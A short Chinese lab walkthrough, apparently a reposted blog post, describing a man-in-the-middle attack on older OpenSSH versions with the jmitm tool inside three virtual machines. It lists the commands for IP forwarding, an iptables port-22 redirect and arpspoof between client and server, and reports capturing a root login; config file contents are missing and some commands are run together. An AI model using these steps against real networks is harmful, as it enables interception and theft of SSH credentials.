利用Jmitm对OpenSSH2.0版本进行中间人攻击中间人攻击

        利用Jmitm对OpenSSH2.0版本进行中间人攻击中间人攻击

准备三台linux虚拟机,除了中间人机器(10.10.19.136)外的另外两台虚拟机的openSSH需要重新下载openSSH5.3此类较早前的版本源码并编译,安装成功后测试openSSH服务是否开启成功。

CenOS查看指令systemctl status service

在中间人机器(10.10.19.136)上下载jmitm软件并解压:

wgethttp://www.david-guembel.de/uploads/media/jmitm2-0.1.0.tar.gz  #下载

tar xfjmitm2-0.1.0.tar.gz   #解压

对该工具进行配置,编辑jmitm软件中的server.xml(/jmitm2-0.1.0/conf/server.xml)配置文件:


对该工具进行配置,编辑jmitm软件中的runm.sh(/jmitm2-0.1.0/bin/runm.sh)配置文件:


运行/jmitm2-0.1.0/bin目录下的runm.sh程序,开始监听连接:

./runm.sh

客户端10.10.19.189    服务端    10.10.19.178   中间人 10.10.19.136

依次运行以下命令:

echo 1 >

/proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING

-p tcp --dport 22 -j REDIRECT

iptables -A FORWARD

-j ACCEPT

arpspoof -i eth0 -t 10.10.19.189(客户端IP)10.10.19.178(服务端IP)


在ssh客户端10.10.19.189登录ssh服务端10.10.19.178并输入密码*********

查看运行的程序runm.sh所输出的内容中,发现成功捕获到用户名(root)/密码(*********):

你可能感兴趣的:(利用Jmitm对OpenSSH2.0版本进行中间人攻击中间人攻击)